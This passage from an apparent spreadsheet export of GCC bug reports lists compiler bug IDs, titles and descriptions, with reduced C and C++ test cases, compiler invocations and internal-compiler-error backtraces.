a reduced one which fails sh-elf with -O2 -ml -m4.  The right
result would be adhbeh... but it wrongly returns ticzzz....
It seems that the compiler allocates a stack slot at r15+60
for len variable first for the line 126:
   len = ((array)-&gt;dim[dim]._ubound + 1 - (array)-&gt;dim[dim].lower_bound)
then computes len - abs (sh) for the line 184
   for (n = 0 n &lt; len - delta n++)
using len variable at r15+68.  The error went away with
-fno-ira-share-spill-slots.</t>
  </si>
  <si>
    <t>GCC-6424</t>
  </si>
  <si>
    <t>[DR 339] sizeof() with overload resolution</t>
  </si>
  <si>
    <t>The attached program causes gcc 3.0.4 to die with:
const-expression-i339.cc: In function `int main()':
const-expression-i339.cc:11: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
A similar death occurs with gcc version 3.2 20020325 (experimental)
See ISO C++ core issue 339.
Release:
gcc version 3.0.4
Environment:
Linux 2.4.17
How-To-Repeat:
template  struct A {}
char xxx(int)
char xxx(float)
template  A f(T){}
int main()
{
  f(1)
}</t>
  </si>
  <si>
    <t>GCC-28703</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/pr28651.c execution</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/pr28651.c execution  -O0
FAIL: gcc.c-torture/execute/pr28651.c execution  -O1
FAIL: gcc.c-torture/execute/pr28651.c execution  -O2
FAIL: gcc.c-torture/execute/pr28651.c execution  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/execute/pr28651.c execution  -O3 -g
FAIL: gcc.c-torture/execute/pr28651.c execution  -Os
This is marked as a testsuite issue because the tests don't actually fail
at least when run manually.</t>
  </si>
  <si>
    <t>GCC-1174</t>
  </si>
  <si>
    <t>Re: gcj/189: can not build libgcj (internal error - SP mismatch) -- PR#155 not fixed</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: Another bogus PR.
    Is the mail interface broken?
</t>
  </si>
  <si>
    <t>GCC-82681</t>
  </si>
  <si>
    <t>c-warn.c:1218: typo in warning message</t>
  </si>
  <si>
    <t>$ fgrep -n chages */*.c
c-family/c-warn.c:1218:		    chages value from %qE to %qE
c-family/c-warn.c:1223:		    chages the value of %qE
$ 
Should be changes shouldn't it ?
svn blame says:
$ svn blame c-family/c-warn.c | fgrep chages
248431     msebor 		    chages value from %qE to %qE
248431     msebor 		    chages the value of %qE
$</t>
  </si>
  <si>
    <t>GCC-58690</t>
  </si>
  <si>
    <t>internal compiler error: in copy_to_mode_reg at explow.c:641</t>
  </si>
  <si>
    <t>[hjl@gnu-6 gcc]$ cat /tmp/foo.c
struct gomp_team_state
{
  void *team
  void *work_share
  void *last_work_share
  unsigned team_id
  unsigned level
  unsigned active_level
  unsigned place_partition_off
  unsigned place_partition_len
  unsigned long single_count
  unsigned long static_trip
}
struct gomp_thread
{
  void (*fn) (void *data)
  void *data
  struct gomp_team_state ts
}
extern __thread struct gomp_thread gomp_tls_data
static inline struct gomp_thread *gomp_thread (void)
{
  return 
}
void
foo (void)
{
  struct gomp_thread *thr = gomp_thread ()
  __builtin_memset (thr '\0' sizeof (*thr))
}
[hjl@gnu-6 gcc]$ ./xgcc -B./ -mx32 -O /tmp/foo.c -S 
/tmp/foo.c: In function â€˜fooâ€™:
/tmp/foo.c:29:20: internal compiler error: in copy_to_mode_reg at explow.c:641
   __builtin_memset (thr '\0' sizeof (*thr))
                    ^
0x79cb0a copy_to_mode_reg(machine_mode rtx_def*)
	/export/gnu/import/git/gcc/gcc/explow.c:641
0x79ca88 copy_addr_to_reg(rtx_def*)
	/export/gnu/import/git/gcc/gcc/explow.c:625
0xe27919 ix86_expand_setmem(rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def*)
	/export/gnu/import/git/gcc/gcc/config/i386/i386.c:23439
0xeff035 gen_setmemsi(rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def*)
	/export/gnu/import/git/gcc/gcc/config/i386/i386.md:15641
0x9f79f6 insn_gen_fn::operator()(rtx_def* rtx_def* rtx_def* rtx_def* rtx_def* rtx_def*) const
	/export/gnu/import/git/gcc/gcc/recog.h:288
0x9f7249 maybe_gen_insn(insn_code unsigned int expand_operand*)
	/export/gnu/import/git/gcc/gcc/optabs.c:8227
0x9f73b6 maybe_expand_insn(insn_code unsigned int expand_operand*)
	/export/gnu/import/git/gcc/gcc/optabs.c:8247
0x7b7f61 set_storage_via_setmem(rtx_def* rtx_def* rtx_def* unsigned int unsigned int long)
	/export/gnu/import/git/gcc/gcc/expr.c:2902
0x7b7926 clear_storage_hints(rtx_def* rtx_def* block_op_methods unsigned int long)
	/export/gnu/import/git/gcc/gcc/expr.c:2748
0x669c97 expand_builtin_memset_args
	/export/gnu/import/git/gcc/gcc/builtins.c:3640
0x6697e4 expand_builtin_memset
	/export/gnu/import/git/gcc/gcc/builtins.c:3530
0x670d96 expand_builtin(tree_node* rtx_def* rtx_def* machine_mode int)
	/export/gnu/import/git/gcc/gcc/builtins.c:6111
0x7d2355 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
	/export/gnu/import/git/gcc/gcc/expr.c:10205
0x6b82a5 expand_call_stmt
	/export/gnu/import/git/gcc/gcc/cfgexpand.c:2182
0x6b839f expand_gimple_stmt_1
	/export/gnu/import/git/gcc/gcc/cfgexpand.c:2220
0x6b89ec expand_gimple_stmt
	/export/gnu/import/git/gcc/gcc/cfgexpand.c:2372
0x6bee5d expand_gimple_basic_block
	/export/gnu/import/git/gcc/gcc/cfgexpand.c:4211
0x6c08ec gimple_expand_cfg
	/export/gnu/import/git/gcc/gcc/cfgexpand.c:4730
0x6c0f76 execute
	/export/gnu/import/git/gcc/gcc/cfgexpand.c:4944
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
[hjl@gnu-6 gcc]$</t>
  </si>
  <si>
    <t>GCC-36446</t>
  </si>
  <si>
    <t>unexplained warning in struct initialization</t>
  </si>
  <si>
    <t>/*
  gcc -W -c test.c
  test.c:18: warning: (near initialization for â€˜m1.h.bâ€™)
*/
struct h {
	int a
	int b
}
struct m {
	struct h h
	int c
}
struct m m1 = {
	.h.a = 1
	.c = 2
}
struct m m2 = {
	.h = {.a = 1}
	.c = 2
}
m1 has that warning but m2 is ok.
I hit this with both these:
 gcc version 4.1.1
 gcc version 4.1.2 20070925 (Red Hat 4.1.2-33)
-Geoff</t>
  </si>
  <si>
    <t>geoffrey.levand</t>
  </si>
  <si>
    <t>GCC-36493</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] vectorizer aliasing bug</t>
  </si>
  <si>
    <t>The following code aborts if built for i686-pc-linux-gnu with -msse2 -O3.
extern void abort (void)
int
main (void)
{
  int i
  long x[12] __attribute__((aligned(16)))
  x[0] = 1
  for (i = 0 i &lt; 12 i++)
    x[i] = i
  if (x[0] != 0)
    abort ()
  return 0
}
The loop gets vectorized using vector int * pointers and then the compiler decides that vector int writes don't conflict with long reads.  (If an array of int is used instead the test passes.)
(Not x86-specific originally observed as a failure of gcc.c-torture/execute/loop-13.c on SPE with an unsubmitted patch to support autovectorization there.)</t>
  </si>
  <si>
    <t>GCC-13562</t>
  </si>
  <si>
    <t>[3.4 regression] bootstrap failure on m68k-linux</t>
  </si>
  <si>
    <t>seen with CVS HEAD 20040103
./xgcc -B./ -B/usr/lib/gcc-snapshot/m68k-linux/bin/ -isystem /usr/lib/gcc-snapsh
ot/m68k-linux/include -isystem /usr/lib/gcc-snapshot/m68k-linux/sys-include -L/h
ome/doko/3.4/gcc-snapshot-20040103/build/gcc/../ld -O2  -DIN_GCC    -W -Wall -Ww
rite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -i
system ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NE
EDED  -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/../include   -DL
_lshrdi3 -c ../../src/gcc/libgcc2.c -o libgcc/./_lshrdi3.o
../../src/gcc/libgcc2.c: In function `__lshrdi3':
../../src/gcc/libgcc2.c:361: error: unrecognizable insn:
(insn 35 34 36 3 ../../src/gcc/libgcc2.c:350 (set (reg:SI 39)
        (lshiftrt:SI (subreg:SI (reg/v:DI 35 [ uu ]) 0)
            (reg:SI 38))) -1 (insn_list 34 (nil))
    (expr_list:REG_DEAD (reg/v:DI 35 [ uu ])
        (expr_list:REG_DEAD (reg:SI 38)
            (expr_list:REG_EQUAL (lshiftrt:SI (subreg:SI (reg/v:DI 35 [ uu ]) 0)
                    (reg:SI 38))
                (nil)))))
../../src/gcc/libgcc2.c:361: internal compiler error: in extract_insn at recog.
c:2083
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[5]: *** [libgcc/./_lshrdi3.o] Error 1
make[5]: Leaving directory `/home/doko/3.4/gcc-snapshot-20040103/build/gcc'
make[4]: *** [libgcc.a] Error 2
make[4]: Leaving directory `/home/doko/3.4/gcc-snapshot-20040103/build/gcc'
make[3]: *** [stage2_build] Error 2
make[3]: Leaving directory `/home/doko/3.4/gcc-snapshot-20040103/build/gcc'
make[2]: *** [bootstrap-lean] Error 2
make[2]: Leaving directory `/home/doko/3.4/gcc-snapshot-20040103/build'</t>
  </si>
  <si>
    <t>GCC-35972</t>
  </si>
  <si>
    <t>[4.4 Regression] load-PRE missed opportunities without SFTs</t>
  </si>
  <si>
    <t>struct Loc {
  int x[3]
}
int foo (int i int j int k int b)
{
  struct Loc IND
  if (b)
    {
      IND.x[0] = i
      IND.x[1] = j
      IND.x[2] = k-1
    }
  else
    {
      IND.x[0] = i
      IND.x[1] = j
      IND.x[2] = k
    }
  return IND.x[0] + IND.x[1] + IND.x[2]
}
used to be optimized to operations on only the scalars i j and k.</t>
  </si>
  <si>
    <t>GCC-21541</t>
  </si>
  <si>
    <t>[4.1 Regression] gcc.c-torture/execute/20031215-1.c compilation fails</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/20031215-1.c compilation  -O2 
FAIL: gcc.c-torture/execute/20031215-1.c compilation  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/20031215-1.c compilation  -O3 -g 
FAIL: gcc.c-torture/execute/20031215-1.c compilation  -Os 
UNRESOLVED: gcc.c-torture/execute/20031215-1.c execution  -O2 
UNRESOLVED: gcc.c-torture/execute/20031215-1.c execution  -O3 -fomit-frame-pointer 
UNRESOLVED: gcc.c-torture/execute/20031215-1.c execution  -O3 -g 
UNRESOLVED: gcc.c-torture/execute/20031215-1.c execution  -Os 
have appeared on mainline between 20050511 and 20050512 on platforms including
at least i686-pc-linux-gnu and hppa{2.0w64}-hp-hpux11.{1123}.  gcc-testresults
shows other platforms as well.
/home/gcc/nightlies/src-mainline-2005-05-12/gcc-mainline-2005-05-12/gcc/testsuite/gcc.c-torture/execute/20031215-1.c:
In function 'test1':
/home/gcc/nightlies/src-mainline-2005-05-12/gcc-mainline-2005-05-12/gcc/testsuite/gcc.c-torture/execute/20031215-1.c:11:
error: Statement makes a memory store but has no V_MAY_DEFS nor V_MUST_DEFS
#   VUSE 
ao.ch[2] = 0
/home/gcc/nightlies/src-mainline-2005-05-12/gcc-mainline-2005-05-12/gcc/testsuite/gcc.c-torture/execute/20031215-1.c:11:
internal compiler error: verify_ssa failed.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-64663</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE at -O1 and above with -g enabled on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O1 and above with -g enabled on x86_64-linux-gnu in both 32-bit and 64-bit modes.
The ICE also affects all earlier versions of GCC since 4.6. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 5.0.0 20150118 (experimental) [trunk revision 219826] (GCC) 
$ 
$ gcc-trunk -O0 -g -c small.c
$ gcc-trunk -O1 -c small.c
$ 
$ gcc-trunk -O1 -g -c small.c
small.c: In function â€˜fn1â€™:
small.c:13:1: internal compiler error: Segmentation fault
 }
 ^
0xa9f6af crash_signal
	../../gcc-trunk/gcc/toplev.c:381
0x736a40 decl_piece_bitsize
	../../gcc-trunk/gcc/dwarf2out.c:5072
0x766c47 dw_sra_loc_expr
	../../gcc-trunk/gcc/dwarf2out.c:13943
0x7673e0 dw_loc_list
	../../gcc-trunk/gcc/dwarf2out.c:14118
0x7673e0 loc_list_from_tree
	../../gcc-trunk/gcc/dwarf2out.c:14562
0x76c5c3 add_location_or_const_value_attribute
	../../gcc-trunk/gcc/dwarf2out.c:16070
0x753250 gen_variable_die
	../../gcc-trunk/gcc/dwarf2out.c:19240
0x754ef9 gen_decl_die
	../../gcc-trunk/gcc/dwarf2out.c:20969
0x7566a4 process_scope_var
	../../gcc-trunk/gcc/dwarf2out.c:20484
0x756877 decls_for_scope
	../../gcc-trunk/gcc/dwarf2out.c:20509
0x756f6a gen_subprogram_die
	../../gcc-trunk/gcc/dwarf2out.c:18832
0x754f69 gen_decl_die
	../../gcc-trunk/gcc/dwarf2out.c:20902
0x755f9c dwarf2out_decl
	../../gcc-trunk/gcc/dwarf2out.c:21335
0x75636e dwarf2out_function_decl
	../../gcc-trunk/gcc/dwarf2out.c:21343
0x7c2dd4 rest_of_handle_final
	../../gcc-trunk/gcc/final.c:4521
0x7c2dd4 execute
	../../gcc-trunk/gcc/final.c:4563
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-----------------------------------
int a b
void
fn1 ()
{
  int c[9] = { 0 }
  for ()
    {
      a = (int) 3655990292 % 9
      if (b &amp;&amp; c[a])
	c[a] = 0
    }
}</t>
  </si>
  <si>
    <t>GCC-28230</t>
  </si>
  <si>
    <t>[4.2 Regression] -O2 -fwrapv miscompiles gcc binutils gzip.</t>
  </si>
  <si>
    <t>/home/users/pluto/rpm/BUILD/trunk/builddir/./gcc/xgcc
-B/home/users/pluto/rpm/BUILD/trunk/builddir/./gcc/
-B/usr/x86_64-pld-linux/bin/ -B/usr/x86_64-pld-linux/lib/
-isystem /usr/x86_64-pld-linux/include
-isystem /usr/x86_64-pld-linux/sys-include
-O2 -O2 -O2 -fno-strict-aliasing -fwrapv -march=x86-64 -pipe
-DIN_GCC Â  Â -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -Wold-style-definition Â -isystem ./include
-I. -I. -I../../gcc -I../../gcc/. -I../../gcc/../include
-I../../gcc/../libcpp/include Â -I../../gcc/../libdecnumber
-I../libdecnumber Â -g0 -finhibit-size-directive -fno-inline-functions
-fno-exceptions -fno-zero-initialized-in-bss -fno-toplevel-reorder
-fno-omit-frame-pointer -fno-asynchronous-unwind-tables 
-c ../../gcc/crtstuff.c -DCRT_BEGIN -o crtbegin.o
../../gcc/crtstuff.c:1: internal compiler error: Segmentation fault
(gdb) set args -fpreprocessed crtstuff.i -quiet -dumpbase crtstuff.i -mtune=generic -auxbase crtstuff -version -o /tmp/ccenndGf.s
(gdb) r
Starting program: /home/users/pluto/rpm/BUILD/trunk/builddir/gcc/cc1 -fpreprocessed crtstuff.i -quiet -dumpbase crtstuff.i -mtune=generic -auxbase crtstuff -version -o /tmp/ccenndGf.s
GNU C version 4.2.0 20060702 (experimental) (PLD-Linux) (x86_64-pld-linux)
        compiled by GNU C version 4.2.0 20060702 (experimental) (PLD-Linux).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Program received signal SIGSEGV Segmentation fault.
0x000000000091cf26 in lshift_significand ()
(gdb) bt
#0  0x000000000091cf26 in lshift_significand ()
#1  0x000000000091fbb4 in normalize ()
#2  0x0000000000921b6c in real_from_integer ()
#3  0x000000000067f18f in init_emit_once ()
#4  0x000000000098f289 in toplev_main ()
#5  0x00000000004a0c91 in main ()
$ ./xgcc -v
Reading specs from /usr/lib64/gcc/x86_64-pld-linux/4.2.0/specs
Target: x86_64-pld-linux
Configured with: ../configure --prefix=/usr
--with-local-prefix=/usr/local
--libdir=/usr/lib64 --libexecdir=/usr/lib64
--infodir=/usr/share/info --mandir=/usr/share/man
--x-libraries=/usr/lib64 --enable-shared
--enable-threads=posix --enable-languages=cc++fortranobjcobj-c++java
--enable-c99 --enable-long-long --enable-multilib --enable-nls
--disable-werror --with-gnu-as --with-gnu-ld --with-demangler-in-ld
--with-system-zlib --with-slibdir=/lib64 --without-system-libunwind
--enable-cmath --with-long-double-128
--with-gxx-include-dir=/usr/include/c++/4.2.0 --disable-libstdcxx-pch
--enable-__cxa_atexit --enable-libstdcxx-allocator=new
--disable-libjava-multilib --enable-libgcj --enable-libgcj-multifile
--enable-libgcj-database --enable-gtk-cairo --enable-java-awt=qtgtkxlib
--enable-jni --enable-xmlj --enable-alsa --enable-dssi --enable-bootstrap x86_64-pld-linux
Thread model: posix
gcc version 4.2.0 20060702 (experimental) (PLD-Linux)</t>
  </si>
  <si>
    <t>GCC-58564</t>
  </si>
  <si>
    <t>[4.7 Regression] possible wrong code bug at -O0</t>
  </si>
  <si>
    <t>regehr@john-home ~ $ clang -O0 -w small.c  ./a.out
0
regehr@john-home ~ $ gcc-4.4 -O0 -w small.c  ./a.out
0
regehr@john-home ~ $ gcc-4.6 -O0 -w small.c  ./a.out
0
regehr@john-home ~ $ gcc-4.7 -O0 -w small.c  ./a.out
1
regehr@john-home ~ $ gcc -O0 -w small.c  ./a.out
1
regehr@john-home ~ $ cat small.c 
int printf(const char * ...)
int a b
short *c
short **d = 
int main() {
  b = (0 0 &gt; ((
  printf(%d\n b)
  return 0
}
regehr@john-home ~ $ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/compiler-install/gcc-r203005-install/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/regehr/z/compiler-source/gcc/configure --prefix=/home/regehr/z/compiler-install/gcc-r203005-install --enable-languages=cc++ --disable-multilib
Thread model: posix
gcc version 4.9.0 20130928 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-41287</t>
  </si>
  <si>
    <t>[4.4 Regression] -O1 optimisation of for loops in some cases omits essential functionality resulting in failed applications</t>
  </si>
  <si>
    <t>In the attached standalone test case (depends only on ::memcpy in string.h) the test fails when compiled with -O1 but succeeds with all other optimisations (-O0 -O2 -O3).
Files attached:
testOpt.cpp - standalone test with compilation information included in the file.
testOpt.ii
Below is the stdout/stderr for the compilation:
[michael@belly gcc_issues]$  g++  -v -save-temps -O1  testOpt.cpp -o testOpt
Using built-in specs.
Target: i586-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++objcobj-c++javafortranada --enable-java-awt=gtk --disable-dssi --enable-plugin --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch=i586 --build=i586-redhat-linux
Thread model: posix
gcc version 4.4.1 20090725 (Red Hat 4.4.1-2) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O1' '-o' 'testOpt' '-shared-libgcc' '-mtune=generic' '-march=i586'
 /usr/libexec/gcc/i586-redhat-linux/4.4.1/cc1plus -E -quiet -v -D_GNU_SOURCE testOpt.cpp -mtune=generic -march=i586 -O1 -fpch-preprocess -o testOpt.ii
ignoring nonexistent directory /usr/lib/gcc/i586-redhat-linux/4.4.1/include-fixed
ignoring nonexistent directory /usr/lib/gcc/i586-redhat-linux/4.4.1/../../../../i586-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/i586-redhat-linux/4.4.1/../../../../include/c++/4.4.1
 /usr/lib/gcc/i586-redhat-linux/4.4.1/../../../../include/c++/4.4.1/i586-redhat-linux
 /usr/lib/gcc/i586-redhat-linux/4.4.1/../../../../include/c++/4.4.1/backward
 /usr/local/include
 /usr/lib/gcc/i586-redhat-linux/4.4.1/include
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O1' '-o' 'testOpt' '-shared-libgcc' '-mtune=generic' '-march=i586'
 /usr/libexec/gcc/i586-redhat-linux/4.4.1/cc1plus -fpreprocessed testOpt.ii -quiet -dumpbase testOpt.cpp -mtune=generic -march=i586 -auxbase testOpt -O1 -version -o testOpt.s
GNU C++ (GCC) version 4.4.1 20090725 (Red Hat 4.4.1-2) (i586-redhat-linux)
	compiled by GNU C version 4.4.1 20090725 (Red Hat 4.4.1-2) GMP version 4.2.4 MPFR version 2.4.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: e983968af33489f00d517096be08dea1
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O1' '-o' 'testOpt' '-shared-libgcc' '-mtune=generic' '-march=i586'
 as -V -Qy -o testOpt.o testOpt.s
GNU assembler version 2.19.51.0.14 (i586-redhat-linux) using BFD version version 2.19.51.0.14-1.fc11 20090722
COMPILER_PATH=/usr/libexec/gcc/i586-redhat-linux/4.4.1/:/usr/libexec/gcc/i586-redhat-linux/4.4.1/:/usr/libexec/gcc/i586-redhat-linux/:/usr/lib/gcc/i586-redhat-linux/4.4.1/:/usr/lib/gcc/i586-redhat-linux/:/usr/libexec/gcc/i586-redhat-linux/4.4.1/:/usr/libexec/gcc/i586-redhat-linux/:/usr/lib/gcc/i586-redhat-linux/4.4.1/:/usr/lib/gcc/i586-redhat-linux/
LIBRARY_PATH=/usr/lib/gcc/i586-redhat-linux/4.4.1/:/usr/lib/gcc/i586-redhat-linux/4.4.1/:/usr/lib/gcc/i586-redhat-linux/4.4.1/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O1' '-o' 'testOpt' '-shared-libgcc' '-mtune=generic' '-march=i586'
 /usr/libexec/gcc/i586-redhat-linux/4.4.1/collect2 --eh-frame-hdr --build-id -m elf_i386 --hash-style=gnu -dynamic-linker /lib/ld-linux.so.2 -o testOpt /usr/lib/gcc/i586-redhat-linux/4.4.1/../../../crt1.o /usr/lib/gcc/i586-redhat-linux/4.4.1/../../../crti.o /usr/lib/gcc/i586-redhat-linux/4.4.1/crtbegin.o -L/usr/lib/gcc/i586-redhat-linux/4.4.1 -L/usr/lib/gcc/i586-redhat-linux/4.4.1 -L/usr/lib/gcc/i586-redhat-linux/4.4.1/../../.. testOpt.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/lib/gcc/i586-redhat-linux/4.4.1/crtend.o /usr/lib/gcc/i586-redhat-linux/4.4.1/../../../crtn.o</t>
  </si>
  <si>
    <t>mhenson</t>
  </si>
  <si>
    <t>GCC-5932</t>
  </si>
  <si>
    <t>Internal compiler error in expand_end_loop at stmt.c:2527</t>
  </si>
  <si>
    <t>The attached file triggers an internal compiler error when optimisation is turned on (-O2).
The command line used is:
gcc -c t.ii -O2 -o t.o
The output from gcc is:
t.cpp: In constructor `B::B()':
t.cpp:20: Internal compiler error in expand_end_loop at stmt.c:2527
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It does not occur when:
- No optimisation is used
- A list is used instead of the map
- mMap is not declared as an array i.e M mMap
Thanks
Rob Walker
Release:
gcc-3.0.4
Environment:
Linux - Redhat 6.2
Intel PIII 800Mhz 128Mb RAM</t>
  </si>
  <si>
    <t>rob.walker</t>
  </si>
  <si>
    <t>GCC-26237</t>
  </si>
  <si>
    <t>[4.2 Regression] None of the OMP_* trees are documented in c-tree.texi</t>
  </si>
  <si>
    <t>While looking for the documention for the OMP_* trees I noticed that they were not documented at all in c-tree.texi where all other trees are documented.</t>
  </si>
  <si>
    <t>GCC-60184</t>
  </si>
  <si>
    <t>g++ does not allow static members of named unions</t>
  </si>
  <si>
    <t>cat &gt; test.cc &lt;&lt;EOF
union Test {
  static constexpr int kConstant = 10
}
EOF
g++ --std=c++0x -c -o test.o test.cc
produces:
test.cc:2:36: error: 'Test::kConstant' may not be static because it is a member of a union
However this is correct according to my reading of the standard as well as the folks here: http://stackoverflow.com/questions/15996333/does-c11-allow-non-anonymous-unions-to-contain-static-data-members
It is also allowed by clang.
9/5 : A union is a class deï¬ned with the class-key union it holds only one data member at a time
Section 9.4 in general describes static members. It places no restrictions on static members in union-type classes.
9.5/1: In a union at most one of the non-static data members can be active at any time that is the value of at most one of the non-static data members can be stored in a union at any time.
There is no reason to specifically call out non-static data members unless static data members can exist.
9.5/5: The member-speciï¬cation of an anonymous union shall only deï¬ne non-static data members.
This only applies to anonymous unions. That this is specifically called out for anonymous unions implies that it *is* allowed in general.
gcc -v:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.6/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.6.3-1ubuntu5' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5)</t>
  </si>
  <si>
    <t>d0sboots</t>
  </si>
  <si>
    <t>GCC-83160</t>
  </si>
  <si>
    <t>[8 regression] lvalue required as unary â€˜&amp;â€™ operand</t>
  </si>
  <si>
    <t>Created attachment 42716
Test case source file
This issue appear in HHVM build with GCC 8. GCC 7.2.1 works fine with attached test case.
$ cat File.i.cpp
namespace a {
template  void ac(b const b 
}
int ag
class c {
  c()
}
template  class C
C ak()
template  class d {
public:
  template  void operator()(an 
  template  void e(ao) {
    auto appender = [] {}
    (*this)(appender)
  }
  void f() { e(ag) }
}
template  class C : public d {}
template 
template 
void d::operator()(an &amp;) const {
  constexpr int bj = 8
  [](int bk) { a::ac(bk bj) }
}
c::c() { ak().f() }
### Fail with GCC 8.0
$g++ --version
g++ (GCC) 8.0.0 20171124 (experimental)
Copyright (C) 2017 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$g++  -ffunction-sections -fno-delete-null-pointer-checks  -std=gnu++1y -fno-omit-frame-pointer -fno-operator-names -fdata-sections -fno-gcse -fno-canonical-system-headers -mcrc32 -O3 --param max-inline-insns-auto=100 --param early-inlining-insns=200 --param max-early-inliner-iterations=50 --param=inline-unit-growth=200 --param=large-unit-insns=10000 -momit-leaf-frame-pointer -Wall -Wextra  -o File.i.cpp.o -c File.i.cpp -Wall -Wextra
File.i.cpp: In instantiation of â€˜void d   &gt;::operator()(an  = int bool  = true  = {}]::  = int bool  = true  = {}]â€™:
File.i.cpp:15:12:   required from â€˜void d   &gt;::e(ao) [with ao = int  = int bool  = true  = {}]â€™
File.i.cpp:17:14:   required from â€˜void d   &gt;::f() [with  = int bool  = true  = {}]â€™
File.i.cpp:26:17:   required from here
File.i.cpp:24:21: error: lvalue required as unary â€˜&amp;â€™ operand
   [](int bk) { a::ac(bk bj) }
                ~~~~~^~~~~~~~
### Pass with GCC 7.2.1
$g++ --version
g++ (GCC) 7.2.1 20171124
Copyright (C) 2017 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$g++  -ffunction-sections -fno-delete-null-pointer-checks  -std=gnu++1y -fno-omit-frame-pointer -fno-operator-names -fdata-sections -fno-gcse -fno-canonical-system-headers -mcrc32 -O3 --param max-inline-insns-auto=100 --param early-inlining-insns=200 --param max-early-inliner-iterations=50 --param=inline-unit-growth=200 --param=large-unit-insns=10000 -momit-leaf-frame-pointer -Wall -Wextra  -o File.i.cpp.o -c File.i.cpp -Wall -Wextra
$ echo $?
0</t>
  </si>
  <si>
    <t>GCC-24582</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] ICE in decl_jump_unsafe</t>
  </si>
  <si>
    <t>Compile the to-be-attached test case and you get an ICE in the front end after errors:
jigdo-file.cc: At global scope:
jigdo-file.cc:491: error: 'class JigdoFileCmd::Command' is not a class or namespace
jigdo-file.cc:491: error: ISO C++ forbids declaration of 'cmdOptions' with no type
 int::cmdOptions(int char**)
jigdo-file.cc:493: error: 'binaryName' was not declared in this scope
jigdo-file.cc:496: error: 'optReporter' was not declared in this scope
jigdo-file.cc:546: error: 'optZipQuality' was not declared in this scope
